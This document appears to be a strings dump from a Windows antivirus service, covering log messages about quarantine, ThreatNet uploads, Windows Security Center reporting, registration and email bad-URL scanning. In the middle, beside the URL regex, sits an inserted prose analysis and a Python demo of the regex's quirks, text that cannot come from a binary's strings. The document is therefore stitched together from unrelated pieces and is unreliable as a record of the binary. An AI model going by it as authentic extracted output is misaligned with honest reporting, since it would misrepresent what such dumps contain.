An error [%d] (%s) occurred de-serializing System Update Scan from the file <%s>. Unable to calculate the Update counts for these scan results.
The most recent System Updates scan results file is (%s). We will calculate the counts for Updates using this scan results file.
\LG*.xml
Initialized m_sbxmlTelemetry object from %s
%s\%s
teltempfile.tmp
\telemetryfile.xml
Transferred telemetry data file named (%s) to the service as (%s).
SbXml::SaveToFileSimply returned false trying to save (%s).
An error occurred attempting to RemediatePatches; com error(0x%x) : (%s)
RemediatePatches returned an unknown error [%u] (%s).
RemediatePatches returned [%u] remediation was successfull, but some patch requires a reboot to be effective.
RemediatePatches returned an error [%u] remediation engine error (timeout expired while executing patches, default 6 hours) (%s).
RemediatePatches returned an error [%u] unexpected exception (%s).
RemediatePatches returned an error [%u] failure while reading the scanresults database (%s).
RemediatePatches returned an error [%u] one of the patch digests passed for deployment was not found in the scan results (%s).
RemediatePatches returned an error [%u] command XML is invalid (%s).
%s: hr = %d
An error occurred attempting to RemediatePatches; return code (0x%x)
Will remediate using the Patches collection provided (%s).
An error [%d] (%s) occurred de-serializing System Update Scan from the file <%s>. Unable to remediate these scan results.
Remediation input file moved from <%s> to <%s>.
Failed copying file from <%s> to <%s>. System Updates unable to complete the remediation operation.
The System Updates scan results file is (%s). We will build the list of updates to apply using this scan results file.
An error occurred attempting to LaunchScan; com error(0x%x) : (%s)
An error occurred attempting to LaunchScan; return code (0x%x)
Couldn't deserialize LanGuard Scan results <%s>, unable to process the scan results.
An error [%d] (%s) occurred saving the System Update Scan results to <%s>. The results of this scan will not be available.
Successfully updated System Update Scan results from <%s>.
Launching (%s) Scan. Directing scan output to (%s).
LG%Y%m%d%H%M%S.xml
An error occurred attempting to UpdateAgent; com error(0x%x) : (%s)
An error occurred attempting to UpdateAgent; return code (0x%x)
Couldn't deserialize LanGuard Scan results <%s>, unable to process the post remediation scan results.
Successfully updated System Update Post Remediation Scan results from <%s>.
Unexpected return status from WaitForMultipleObjects() [%u]. Will ignore and wait for next event.
System Update is set to auto apply patches after a scan. Setting the event to start the remediation process using the scan results file (%s).
It has been [%d] days since our last check for System Update definitions. Definitions update before scan starting.
_pt-BR.dll
_it-IT.dll
_en-US.dll
_de-DE.dll
Loaded resource file <%s>
Unable to load resource file <%s>
\SBRES_*_*.dll
UI Default Language is: %d
Lazy scan stopping at folder=<%s>, file=<%s>
Lazy scan stopping at folder=<%s>
Lazy scan root folder=<%s>
User is %s
UserIdleTime=<%u>
CPU is %s, Disk is %s
SBWinHttp callback returned result: %d
Error sending file to BD: [%u].
Adding File to cache: %s
Could not open MIMETypes.txt
Invalid word on MIMEtype.txt for ON/OFF field: (%s)
SiteID is in range. The Enabled flag is <%s>.
SiteID=<%s>, Enable=<%s>, MinID=<%s>, MaxID=<%s>
\MIMETypes.txt
Unable to get file handle for: (%s)
Could not create ThreatNetTransfer XML for: (%s)
Could not crack the ThreaNet URL nothing will be getting sent. URL=%s
Could not create temp file for transfer. Skipping: %s
Saving query list to %s
%s\Query-%d.xml
Received action response from query: %u
Send file queue max reached in SENDFILE. Dropping file: (%s)
Send file queue max reached in SENDFILEANDCACHE. Dropping file: (%s)
Response file path not found in Query: (%s)
ThreatNetConfig.xml
Setting Threatnet send URL to: (%s).
Setting Threatnet URL to: (%s).
Setting Threatnet query URL to: (%s).
Failed starting ThreatNet thread. Windows Security Center status will not be updated.
Error opening reg key Software\Microsoft\Windows\CurrentVersion\Run.
Sucessfully read keys from Software\Microsoft\Windows\CurrentVersion\Run.
Software\Microsoft\Windows\CurrentVersion\Run
Error opening reg key SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run.
Sucessfully read keys from SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run.
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
%d.%d
ThreatNetFileCache.txt
RegOpenKeyEx failed deleting sbamui run key value.
RegDeleteValue failed with return code [%ld] deleting sbamui run key value. Key will not exist after first run.
DeleteRunKeyValue
SBAMUI run key value not found.
AdjustTokenPrivileges (%s) failed.
LookupPrivilegeValue (%s) failed.
{31463A1D-577C-4D78-A9C8-0A65C17727B5}
OnPowerEvent dwEeventType=[%d].
Updated checkpoint [%d] and ServiceStatus is [%d].
OLEAUT32.DLL
Failed starting update_status_thread_handle thread. The service status may not be reported correctly during shutdown process.
HandlerEx dwEeventType=[%d].
HandlerEx dwOpcode=[%d].
Waiting for the Threat Engine Open thread to finish, current CheckPoint is (%d). CheckPoints occur every five seconds until the Threat Engine open completes.
Renamed the old scan history folder (%s) to (%s).
CoInitializeSecurity() failed. HR=0xx
Mscoree.dll
CProxy_ISBServiceEvents<class CSBService>::Fire_SendMsgToClientsCB
CSBService::SendMsgToClients
CSBService::OnSendMsgToClientsCB
Setting the this pointer for the Service CoClass [%x].
SERVICE_CONTROL_STOP control message has been sent to the service (%s)
OpenService for (%s) failed. Unable to send the Stop command to the Service.
Set the Service thread priority to %d. This should be THREAD_PRIORITY_NORMAL.
The power status is %d.
Service ErrorState is currently [%s].
CSBServiceImpl::SendMsgToClients
A client is sending a message of type %d, parameters [%u], [%u] to all other clients.
The Embassy Trust Suites wxvault.dll was successfully unloaded from our process space.
Couldn't unload the Embassy Trust Suites wxvault.dll from our process space.
Found the Embassy Trust Suites wxvault.dll loaded into our process space. Attempting to unload it.
wxvault.dll
Failed to OpenService on (%s).
Couldn't read "HKLM\Software" key.
Couldn't read "HKLM\Software\SBAMSvc" key.
Retrieved Enterprise Product Code value [%d] under HKLM\Software\SBAMSvc key. This is an Enterprise agent.
CSBServiceImpl::RetrieveEnterpriseRegKeys
Couldn't get Enterprise Product Code value under "HKLM\Software\SBAMSvc" key. This is not an Enterprise agent.
Couldn't read (%s) key.
CSBServiceImpl::CreateVolatileSystemUpdateRestartKey
Couldn't open "HKLM\Software" key.
Couldn't open "HKLM\Software\SBAMSvc" key.
couldn't set "Company" value under "HKLM\Software\SBAMSvc" key
couldn't set "Product" value under "HKLM\Software\SBAMSvc" key
company <%s> and product <%s> names persisted
Could not write TypesSupported registry key, error [%ld].
TypesSupported
Could not write EventMessageFile registry key, error [%ld], path (%s).
Could not write CategoryMessageFile registry key, error [%ld], path (%s).
Could not write CategoryCount registry key, error [%ld].
Could not open CurrentControlSet\Services\EventLog\Application\SBAMSvc registry key, error [%ld].
CSBServiceImpl::WriteEventLogKeyToRegistry
Could not open HKLM\System registry key.
Scheduled update or scan is starting now (%s), the last time we woke from sleep was (%s), tNow - tWakeTime = [%d].
Have not already sent this Threat file <%s> to ThreatNet.
Threat file <%s> with no MD5 was already sent to ThreatNet. Threat file will not be sent to ThreatNet again.
Threat file <%s> with MD5 <%s> was already sent to ThreatNet. Threat file will not be sent to ThreatNet again.
Unable to save company <%s> and product <%s> names. There may be problem with the registry. Application data may be written to a different folder.
Saved company <%s> and product <%s> names.
version is <%s>
Unable to set the service startup type to delayed auto start. Non Vista OS doesn't support that setting.
ChangeServiceConfig2 called with service type of delayed SERVICE_AUTO_START for the service (%s)
ChangeServiceConfig2 for (%s) failed. Unable to set the service startup type to delayed auto start.
ChangeServiceConfig called with service type of SERVICE_AUTO_START for the service (%s)
ChangeConfigService for (%s) failed. Unable to send the ChangeServiceConfig command to set the service startup type to auto start.
OpenService for (%s) failed. Unable to send the ChangeServiceConfig command to set the service startup type to auto start.
HTTP Error:%ld
%ld:%s
winhttp.dll
Couldn't create "HKLM\Software\SBAMSvc" key.
Couldn't create default "Product" value under "HKLM\Software\SBAMSvc" key
Couldn't create default "Company" value under "HKLM\Software\SBAMSvc" key.
Created default "(%s)" value under "HKLM\Software\SBAMSvc" key.
Couldn't get "Company" value under "HKLM\Software\SBAMSvc" key. Creating default values.
Company <%s> and product <%s> names retrieved.
Unable to create folder. AppDataFolder specified but the path (%s) was invalid.
Wrote data of length <%d> into file path <%s>.
Wrote <%d> but expected to write <%d>. Write file operation failed, file incomplete.
Failed writing data into file <%s>. Write file operation failed.
Failed writing BOM into file path <%s>. Write file operation failed.
Couldn't open file path <%s>. Write file operation failed.
-X.xml
\%Y%m%d%H%M%S.xml
\AP-%Y%m%d%H%M%S
knownType=%d MD5=<%s> csOriginalThreatFilepath=<%s>.
Threw an error trying to launch one or more Trays with the path of %s.
An error occured launching one or more Trays with a path of %s.
Tray Execute
The Tray(s) were successfully executed %s.
SBAMTray.exe"
Converted Threat Name (%s) to valid file name.
Checking (%s) to make sure it is valid file name.
/\:?"*<>|
Couldn't get the installation folder. Unable to set <%s> environment variable.
Exceeded max %d in m_AlreadySentToTN. Removing the first in the collection <%s>.
Remembering file path <%s> so we don't send it to ThreatNet again.
Remembering MD5 <%s> for threat <%s> so we don't send it to ThreatNet again.
Unable to transfer suspicious file (%s) from APEventID (%s). One or both of the parameters is empty.
Error encrypting Suspicious file <%s> to <%s>. ThreatNet will not be updated.
Error removing file <%s>.
Suspicious threat file <%s> transfered to ThreatNet.
File transfer operation failed sending Suspicious file <%s> to ThreatNet. ThreatNet will not be updated.
Could not remove old Threatnet file <%s>. File is orphaned on the disk.
%Y/%m/%d
quarantine\QR{*.xml
Couldn't set threat engine's Quarantine callback. Operation failed.
Couldn't set threat engine's log callback. Operation failed.
Setting quarantine path to <%s>.
Setting Threat engine definitions folder location to <%s>.
Created TEL zip file (%s) for transfer to ThreatNet.
Deleted temp TEL zip file (%s).
Error renaming the temp TEL zip file (%s) to (%s).
Improperly formatted file path passed in. Unable to transfer file [%s].
TEL-{%s}
Created FPF zip file (%s) for transfer to ThreatNet.
Deleted temp FPQ zip file (%s).
Error renaming the temp FPF zip file (%s) to (%s).
Error adding FP file (%s) to zip file (%s). FP file will not be sent to ThreatNet.
FPF-{%s}
GetQuarantineFilePathFromID didn't return a path for Quarantine ID (%s). Threat file will not be sent to ThreatNet.
Quarantined threat file <%s> transfered to ThreatNet.
File transfer operation failed sending file <%s> to ThreatNet. ThreatNet will not be updated.
Error copying file <%s> to <%s>. ThreatNet will not be updated.
There wasn't a Quarantine item for APEventID (%s) might be a suspicious item that wasn't quarantined.
Error adding FP Quarantine trace file (%s) to zip file (%s). FP file will not be sent to ThreatNet. Will attempt to get remaining traces.
Error adding FP Quarantine Meta Data file (%s) to zip file (%s). FP file will not be sent to ThreatNet.
FPQ-%Y%m%d%H%M%S_
While saving the Private Config File (%s), InitObjectFromXmlBufferAndLog failed.
While saving the Private Config File (%s), SaveToFileAndLog failed.
While trying to write Service Config File (%s), received error.
ServiceConfig.xml
Incremented the %s counter to %d.
%Y-%m-%d
Failed to exec Process64.exe to enumerate the 64 bit processes.
Failed to retreive the RunningProcsList at (%s).
Retreived the RunningProcsList at (%s).
Exec'd Process64.exe to enumerate the 64 bit processes.
Path to program for reading 64 bit OS process list is (%s).
\x64\Process64.exe"
Error while reading the Private Config File (%s). Config file may not exist or is corrupted.
While trying to write a default Service Config File (%s), received error.
While reading the Service Config File (%s). Config file may not exist or is corrupted. Creating default config file for the Service controller.
CountScans.XML
CountCleanedScans.XML
CountCleanedAP.XML
CountCleanedEmailAV.XML
CountBlockedByFirewall.XML
Internet access is %s
SBAMUIConfig.xml
SocialWatchConfig.xml
Error [%d] (%s) occurred saving the Social Watch History to <%s>. The history of this scan will not be available.
\SW{%s}.xml
Not opted in to ThreatNet bypassing ThreatNet processing.
Setting Long Product Name from Short Product Name (%s).
Did not find the Email AV Bad Url Replacement message text. Cannot set sku specific config values.
Did not find the Email AV SMTP error string. Cannot set sku specific config values.
Did not find the SPURS Base URL string resource. Cannot set software update sku specific config values.
Did not find the ThreatNet telemetry Enterprise URL string resource. Cannot set sku specific config values.
Did not find the ThreatNet Send Enterprise URL string resource. Cannot set sku specific config values.
Did not find the ThreatNet Query Enterprise URL string resource. Cannot set sku specific config values.
Did not find the ThreatNet Enterprise URL string resource. Cannot set sku specific config values.
Did not find the SPURS base URL string resource. Cannot set sku specific config values.
Did not find the AutoGet URL string resource. Cannot set sku specific config values.
Did not find the Registration Update URL string resource. Cannot set sku specific config values.
Did not find the Registration URL string resource. Cannot set sku specific config values.
Setting Long Product Name (%s).
Setting Enterprise Long Product Name (%s).
Error setting Company (%s) Product (%s). Cannot set sku specific config values.
Firing System error state changed event. Error State is now [%s].
%u: %s
\EV%s%.02d.xml
%Y-%m-%dT%H:%M:%S
A client is logging a system event of type %d for subsystem %d.
APEvent <%s> transfered to ThreatNet.
File transfer operation failed sending APEvent: <%s> to ThreatNet. ThreatNet will not be updated.
FindFirstFile returned an error when we tried to find <%s>. There are no FP files to send to ThreatNet.
Could not delete FP file <%s>. File is orphaned on the disk but will be cleaned by the 30 day purge.
File transfer operation failed sending FP file <%s> to ThreatNet.
Found FP file to send to ThreatNet <%s>.
FP*.zip
FindFirstFile returned an error when we tried to find <%s>. There are no telemetry files to send to ThreatNet.
Found telemetry file to send to ThreatNet <%s>.
TEL*.xml
FindFirstFile returned an error when we tried to find <%s>. There are no Scan History file to send to ThreatNet.
Could not unlink Threatnet file <%s>. File is orphaned on the disk.
Could not process Suspicious Threat file for APEvent <%s>.
Could not process Quarantine Threat file for APEvent <%s>. Looking for Suspicious file.
Found APEvent xml file to send to ThreatNet <%s>.
Error removing file <%s>. Exceeded %d APEvent xml files to send to ThreatNet.
Exceeded %d APEvent xml files to send to ThreatNet. Removed APEvent xml file <%s>.
Found scan results file to send to ThreatNet <%s>.
20*.xml
FindFirstFile returned an error when we tried to find <%s>. There are no AP Event XML files to send to ThreatNet.
AP*.xml
Set the Service thread priority to %d. This should be THREAD_PRIORITY_LOWEST to minimize the impact of ThreatNet transfers on other applications.
Preparing to purge the quarantine. Days to keep = %d.
Delete of quarantined item with QId = [%s] failed.
Deleted quarantine item with QId = [%s].
Preparing to delete QId = [%s].
The results for quarantining a file is <%d>
The results for quarantining a file are <%d>
The results for quaranting a buffer are <%d>
Couldn't get quarantine record. QId=<%s>
Successfully got the quarantine record. QId=<%s>
Got size of quarantined record. quarantineItemSize=[%d]
Couldn't get quarantine item following szQID=<%s>
Successfully queried next quarantined item szQID=<%s>
Unkown quarantine action type [%d].
Found a full path trace to update in known bad apps = [%s], MoveToAlwaysAllowed = %s.
Found a threat to add to the always allow [%d].
The bulk trojan or AP Holding threat was asked to be added to the ignored threats list from QId = [%s]. That would be bad so adding to known good collection by path instead.
Checking threat traces for a file trace to unquarantine for QId = [%s], MoveToAlwaysAllowed = [%s].
Could NOT desrialize the quarantine data from the service for ID [%s]. Will not remove quarantine item from always blocked list.
Could NOT get the quarantine date for ID [%s]. Will not remove quarantine item from always blocked list.
Unquarantined failed, no client PID provided, QId = [%s], folder = [%s], MoveToAlwaysAllowed = [%s].
Unquarantined failed because impersonation failed, QId = [%s], folder = [%s], MoveToAlwaysAllowed = [%s].
Unquarantined with impersonation failed QId = [%s], folder = [%s], MoveToAlwaysAllowed = [%s].
Unquarantined with impersonation succeeded, QId = [%s], folder= [%s], MoveToAlwaysAllowed = [%s].
Unquarantined QId = [%s], folder= [%s], MoveToAlwaysAllowed = [%s].
Preparing to unquarantine QId = [%s], folder= [%s], MoveToAlwaysAllowed = [%s].
Processed %d quarantine queue items.
Invalid quarantine item action if %d.
3.0.1
1.0.0.1
Unable to delete file (%s).
Removing old software update download (%s).
\*.exe
Returning path to software update: (%s).
SoftwareUpdateConfig.xml
The configuration information was saved to file <%s>.
Just retrieved the SPURS latest version number of %s
Got software update file=<%s>.
Couldn't find any executables in the Download folder. Software update isn't available.
Software update enabled flag %s.
Current local software version is (%s).
Exception thrown by SPURS SDK on download: <%s>, continuing anyway. Thread will wait for next event.
Exception thrown by SPURS SDK on scheduled download: <%s>, continuing anyway. Thread will wait for next event.
Unknown dwWaitStatus [%u]. Ignoring this wait return.
Wait for event to start operation.
Vipre dll version is <%s>
definitions\vcore.dll
0.0.0.0
CSBThreatDefinitions::ReportClientUpdateStatus
Setting the this pointer for the ThreatDefinitions CoClass to <%x>.
Did not get the mutex but the wait returned with %d, so go ahead and scan.
Error retrieving Proxy values (Server = %s, Username %s, Password = %s or Port = %ld) from registry.
ProxyPort
ProxyPassword
Setting the event to wake up the threat definitions controller thread to check for threat defs. Is manual %s.
Undefined known state for file <%s>.
Couldn't get known state for file <%s> from threat engine. Leaving now.
Successfully added a one time schedule item for pre-scan threat defs update check at %s. The timer %s wake up the computer.
Deleted defs version file [%s] to force an update to a compatible definitions version.
Could not delete defs version file [%s]. The system may run with incompatible definitions until the next update.
Definitions\DefVer.txt
Current defs are version %d, which are newer than or equal to the min needed of %d, definitions version file was not deleted and we will not force an update.
Checking to see if this machine has the minimum required defs version needed. Minimum version required is %d, local version is %d.
%d (%s)
SBCSApplyDefinitionUpdate called back to see if we want to continue and returned (%s). Updates applied %d, total updates to apply %d, reload is (%s).
While trying to write the ThreatDefinitions Config File (%s).
Error while reading the Config File (%s). Config file may not exist or is corrupted, creating default config file.
ThreatDefinitionsConfig.xml
Couldn't save config data, dwError=<%d>. New settings were NOT saved into the file.
Error converting the config buffer from the client. Unable to save the configuration information to file <%s>. Error code was %d.
Threat definitions enabled flag %s.
CSBThreatDefinitionsImpl::ReportClientUpdateStatus
Using threat defs file in folder <%s>.
Performing a check for Threat definitions updates. Is manual %s.
Unable to apply update <%s>.
Apply of threat definitions update file <%s> succeeded.
Unable to manually apply update. There may be a problem with the definitions file (%s).
Unknown dwWaitStatus [%d]. Ignoring this wait return.
The event to check for a threat definition update before a scan was signalled for schedule item <%d>. Checking if an update is needed.
The scheduled check for a threat definition update event was signalled for schedule item <%d>. Checking if an update is needed.
Failed starting worker thread. Threat definitions controller is inoperable.
Error encountered deserializing the config information <%s>.
Unable to open the WSC / Action Center service using Service Control Manager, the WSC / Action Center service is not installed and our status will not be reported.
Unable to OpenService wscsvc. Vipre features may not be reported correctly in WSC.
Unable to OpenSCManager. Vipre features may not be reported correctly in WSC.
Unable to get Service settings config object. Vipre features will not be reported in WSC.
IsVipre returning %s.
QueryStatus returned apState [%d], apStatus [%d].
QueryStatus returned fwStatus [%d].
Couldn't terminate WSC thread. Windows Security Center status may not correctly reflect the state of the service.
Removed Firewall instance from WSC, hr=[%x].
Unable to Uninstall Firewall Class from WSC, hr=[%x].
Removed AntiSpyware instance from WSC, hr=[%x].
Unable to Uninstall AntiSpyware Class from WSC, hr=[%x].
Removed AntiVirus instance from WSC, hr=[%x].
Unable to Uninstall AntiVirus Class from WSC, hr=[%x].
CoCreateInstance for Firewall interface failed, hr=[%x]. Unable to remove our instance from WSC
Uninstalled Firewall from WSC, hr=[%x].
Unable to Uninstall Firewall from WSC, hr=[%x].
CoCreateInstance for AntiVirus interface failed, hr=[%x]. Unable to remove our instance from WSC
Uninstalled AntiVirus from WSC, hr=[%x].
Unable to Uninstall AntiVirus from WSC, hr=[%x].
CoCreateInstance for AntiSpyware interface failed, hr=[%x]. Unable to remove our instance from WSC
Uninstalled AntiSpyware from WSC, hr=[%x].
Unable to Uninstall AntiSpyware from WSC, hr=[%x].
Windows type is Vista or newer so we updated AntiSpyware state [%d] and (%s) to WSC.
Unable to write AS status to WSC, hr=[%x].
IsFirewallSKU returned true so we updated Firewall state [%d] to WSC, hr=[%x].
Unable to write FW status to WSC, hr=[%x].
IsVipreSKU returned true so we updated AntiVirus state [%d] and (%s) to WSC.
Unable to write AV status to WSC, hr=[%x].
IsFirewallSKU returned true so we updated Firewall state [%d] to WSC API.
Unable to write FW status to WSC, Failed UpdateStatus hr=[%x].
Unable to CoCreateInstance for FW with WSC, hr=[%x].
IsVipreSKU returned true so we updated AntiVirus state [%d] and (%s) to WSC API.
Unable to write AV status to WSC, Failed UpdateStatus hr=[%x].
Unable to CoCreateInstance for AV with WSC, hr=[%x].
Windows type is Vista or newer so we updated AntiSpyware state [%d] and (%s) to WSC API.
Unable to write AS status to WSC, Failed UpdateStatus hr=[%x].
Unable to CoCreateInstance for AS with WSC, hr=[%x].
SBAMWSC.EXE
Unable to update Windows Security Center with current status.
Registered FW product [%s] with display name [%s] with WSC, hr=[%x].
Unable to Register FW [%s] with display name [%s] with WSC, hr=[%x].
Registered AV product [%s] with display name [%s] with WSC, hr=[%x].
Unable to Register AV [%s] with display name [%s] with WSC, hr=[%x].
Registered AS product [%s] with display name [%s] with WSC, hr=[%x].
Unable to Register AS [%s] with display name [%s] with WSC, hr=[%x].
WSCConfig.xml
Invalid UpdateCheckIntervalHours value [%d] in WSC Config File.
FW state did not change. Current state is [%d]
FW state changed. Current state is [%d], new state is [%d]
AP state did not change. Current state is [%d]
AP state changed. Current state is [%d], new state is [%d]
WSC Controller is disabled and we tried to remove ourself from WSC and failed, maybe we were never installed into WSC [%x].
Note: Versions of Windows before Vista don't support AntiSpyware in Windows Security Center.
UpdateCheckInterval timer expired after [%d] hours.
Failed starting WSC thread. Windows Security Center status will not be updated.
CProxy_ISBActiveProtectionEvents<class CSBActiveProtection>::Fire_APReportingCB
CSBActiveProtection::OnAPReportingCB
Add of PID [%d] to AP failed with error %d.
Added PID [%d] to AP.
APConfig.xml
\Logs\ap.etl
Wrong user known type %d.
Couldn't encode the Hash for passing to the scan controller.
Received prompt ACK for msg_id [%s].
Message %s has been answered by the user
CSBActiveProtectionImpl::ReportCallback
report event has been received.
Extension in list is NOT in file. Removing it from the collection; Extension = [%s].
Adding file extension to collection; File ext = [%s].
Unable to decrypt extensions file [%s]. The extensions collection was NOT updated.
\apincl.dat
AP%s.xml
Registration Code Status is [%d], Enabled is [%s].
RegistrationConfig.xml
Install date is invalid. Deleting the SBAMConfig.dll file. This file determines the evaluation period.
File <%s> deleted
Could not delete file: %s
CheckInstallDateFile unable to get install date. Deleting the SBAMConfig.dll file. This file determines the evaluation period.
SBAMConfig.bin
There is a Registration Key in the config file or in the Registry. We don't need to request one from SKMS.
The registration key we received from SKMS returned an invalid status when we sent it back for an Update check. Will try request a key again on next check.
CheckRegistration returned (%s).
Couldn't get pointer to CSBRegistrationImpl instance. Will not be able to start Check Registration thread or check users regisrtration key status for the application.
There is a Registration Key in the Registry but not in the config file. Update the Config file, and get the key status from SKMS.
Failed starting thread. Application will not be able to verify registration key status.
Failed creating CheckRegistration event. Application will not be able to verify registration key status.
Failed creating m_hQuitCheckRegistrationThread event. Application will not be able to verify registration key status.
Registration thread DIDN'T start. Application will not be able to verify registration key status.
Registration Code Status is [%d].
Setting log level to %d.
Setting log roll over size to %d.
Setting log file count to %d.
Url <%s> contains a known %s domain.
Couldn't replace bad url link node; search and replace will be aborted and HTML will not be modified.
SBAntiPhishing::ProcessHTMLElement
Bad url link node successfully replaced.
HTML document successfully processed; no bad url link nodes were found.
HTML document successfully processed; %d bad url link nodes were replaced.
Exception occurred while trying to process the text; text will not be modified. (%S)
Text successfully processed; no bad urls were found.
Text successfully processed; %d bad urls were replaced.
Bad url successfully replaced.
{(((https?)|(ftp)://)|(www\.)|(ftp\.))([-A-Z0-9 &@#/%?=~_|!:,.;]*)([-A-Z0-9 &@#/$=~_|])}
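The expression immediately above is the pattern the email scanner uses to locate URLs in message text (it sits beside the ScanTextForBadUrls and "Bad url successfully replaced" strings). Two details of it are worth seeing in action rather than reading: a space is a member of the first character class, so a match keeps running past the end of a URL into the following words, and inside the first group alternation binds looser than concatenation, so `://` is only required after `ftp` and a bare `http`/`https` word is treated as the start of a URL. The following Python is an added example, not code from the report or from the product; it runs the page's pattern verbatim (the enclosing braces dropped, as they are delimiters rather than pattern syntax) over constructed sample text.

```python
import re

# The URL-matching expression exactly as it appears in the strings dump above,
# minus the enclosing braces. Note the precedence inside the first group:
# it reads as  (https?) | (ftp)://  so "://" is only demanded after "ftp".
BAD_URL_PATTERN = (
    r"(((https?)|(ftp)://)|(www\.)|(ftp\.))"
    r"([-A-Z0-9 &@#/%?=~_|!:,.;]*)"   # greedy body; note the space inside the class
    r"([-A-Z0-9 &@#/$=~_|])"          # final char; '.', ':', ';', '!' are excluded
)
URL_RE = re.compile(BAD_URL_PATTERN, re.IGNORECASE)


def find_urls(text: str) -> list[str]:
    """Return every substring the page's expression would treat as a URL."""
    return [m.group(0) for m in URL_RE.finditer(text)]


# Constructed sample text (not taken from the report), each line chosen to
# expose one behaviour of the pattern.
SAMPLES = {
    "runs past the URL": "Visit http://example.com/login now",
    "bare scheme word": "https is a scheme",
    "trailing dot dropped": "see www.example.org.",
    "ftp. host": "mirror at ftp.example.net/pub",
    "nothing": "no links here",
}


def demo() -> dict[str, list[str]]:
    """Map each sample label to the matches the pattern produces for it."""
    return {label: find_urls(text) for label, text in SAMPLES.items()}


if __name__ == "__main__":
    for label, hits in demo().items():
        print(f"{label:>22}: {hits}")
```

The first sample shows why the replacement text strings nearby could swallow words after a link: the body class accepts spaces, and the final class only forces the match to back off over a trailing `.`, `:` or `;`. The second shows that the word "https" on its own is enough to trigger a match.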
CSBEmailAV::BadUrlAction
CSBEmailAV::IsBadUrlCheckingEnabled
CloseEmailWindowMsgText is NULL
CSBEmailAV::GetCloseEmailWindowMsgText
Invalid parameter: MessageAttachment = [%p], OriginalBufferSize = [%d], AttachmentName = [%p], DateTime = [%p], Subject = [%p]
Invalid parameter: Subject = [%p], Extension = [%p], Buffer = [%p], BufferSize = [%d]
CSBEmailAV::ScanTextForBadUrls
priority=<%d>, msg=<%S>
Expanding %%CRLF%%...
%CRLF%
Invalid %%PRODUCTVERSION%% [%s]
Replacing %%PRODUCTVERSION%% with [%s]
Invalid %%ATTACHMENTNAME%% [%s]
Replacing %%ATTACHMENTNAME%% with [%s]
Invalid %%THREATNAME%% [%s]
Invalid %%THREATDEFVERSION%% [%d]
Replacing %%THREATNAME%% with [%s]
Replacing %%THREATDEFVERSION%% with [%s]
Invalid %%VIPREVERSION%% [%s]
Replacing %%VIPREVERSION%% with [%s]
Invalid %%COMPANY%% [%s] or %%PRODUCT%% [%s]
Replacing %%COMPANY%% with [%s], %%PRODUCT%% with [%s]
Expanding %%COMPANY%% and %%PRODUCT%%...
%COMPANY%
Invalid %%PRODUCTLONG%% [%s]
Replacing %%PRODUCTLONG%% with [%s]
Expanding tokenized string; Text = [%s], Threat Name = [%s], Attachment Name = [%s]
cmclient1.dll
Failed to open file; key=<%s>, error=<%d>
Failed to read file; key=<%s>, error=<%d>
Failed to create file; key=<%s>, error=<%d>
Failed to write data; key=<%s>, error=<%d>
Failed to delete file; key=<%s>, error=<%d>
op=<%d>, key=<%s>, success=<%d>
EmailAVConfig.xml
Bad url definition file could not be loaded.
LoadBadUrlDefs
Bad url definition file was successfully loaded.
Couldn't copy known bad url dll from defs folder to install folder; will continue using previous dll.
Successfully copied known bad url dll from defs folder to install folder.
kbu.dll
EmailAV released known bad url dll.
Definitions were updated; we need to unload the known bad url dll, copy it from the defs to the install dir, and then reload it.
Returning undelivered subject prefix [%s]
Returning undelivered body text [%s]
CSBEmailAVImpl::GetCloseEmailWindowMsgText
Returning close email window message text [%s]
CSBEmailAVImpl::GetBadUrlReplacementText
Returning text to replace bad urls [%s]
Failed to quarantine the email message; subject=<%s>, filename=<%s>
Successfully quarantined the email message; subject=<%s>, filename=<%s>, cleaner result=<%d>, quarantine id=<%s>
Failed to create client; error=<%d>
Failed to set client persist callback; error=<%d>
Failed to create client description; error=<%d>
Failed to set client description; error=<%d>
Failed to start client; error=<%d>
Failed to wait for client ready; error=<%d>
Failed to create catalog session; error=<%d>
IFailed to parse message; error=<%d>
Failed to query catalog session; error=<%d>
Failed getting threat id [%d] name
Got name <%s> for threat id [%d]
BadUrls collection
CSBEmailAVImpl::ScanTextForBadUrls
Returning text to append [%s]
Returning inbound text to append [%s]
Cloudmark scan %s; message %s spam
Sender=<%s> is not in the address list; scan the message for spam
Sender=<%s> is in the address list as allow; do not mark the message as spam
Sender=<%s> is in the address list as block; mark the message as spam
Scanning message for spam; subject=<%s>, date=<%s>, sender=<%s>
No threat definitions; attachment = [%s] will not be scanned
Buffer contains threat; nThreatId=[%u]
Unknown buffer; will attempt to %s it if a threat is detected
Failed to quarantine buffer; passing through unmodified
Detected non-cleanable pseudo threat; will attempt to %s it
Scanning attachment; MessageBuffer = [%p], OriginalBufferSize = [%d], strAttachmentName = [%s]
State changed from [%s] to [%s]
Arva failed to start : [%d]
Could not enable monitor [%d] on port [%d] : [%d]
WindowsLiveMail Support: [%s]
SHELL Executed to register WlMailApiCom.dll
-s WLMailApiCom.dll
SHELL Executed to register WlMailApiStore.dll
-s WLMailApiStore.dll
Failed to register [%s],WindowsLiveMail support Will not work
SHELL Executed to register WlMailApiInit.dll
-s WLMailApiInit.dll
regsvr32.exe
{93ABC5F0-879F-4400-9AE9-F2742A03A229}
EmailAV is configured to quarantine messages containing bad urls; make a backup of the original message now.
EmailAV is not configured to quarantine messages containing bad urls; do not make a backup of the original message.
Pseudo-bad url successfully replaced.
VIPRE_PSEUDO_BAD_URL
Unexpected result=<%d> while waiting for events
Unexpected result=<%d> waiting for config thread to stop; config thread will be terminated
Body did not contain bad url
Body contained bad url and was replaced
Bad url checking is disabled; message body will not be scanned.
Incorrect date/time passed [%s]. Cannot convert to a time_t value.
An invalid length or invalid buffer was passed into ReadFromFile.
Read all data from file <%s>.
d:d:d %d/%d/%d
%x %X
FindFirstFile did not succeed on path <%s>. No files were found.
Deleted (%s) - [%d] files remaining.
Error removing file (%s).
The (%s) list has (%d) items.
List is empty adding files (%s) to list.
%s\%s*.xml
SBAM.Common
Env var<%s> value too big(>%u)!
GetProcAddress('%s') failed
LoadLibrary('%s') failed
Failed to read env var<%s>
We have an error trying to build the envPath from %s
Rpcrt4.dll
Programmer error! The size of PIDs is NOT large enough! (index) %d > %u (size).
PID[d] = d <%s>.
Found process - d <%s> hTask16 (%d).
Found process - d <%s>.
NTVDM.EXE
VDMDBG.DLL
Kernel32.DLL
Successfully launched <%s> for user u <%u>.
DuplicateTokenEx 0xX dup(0xX).
OpenProcessToken 0xX token 0xX.
OpenProcess %u HANDLE 0xX.
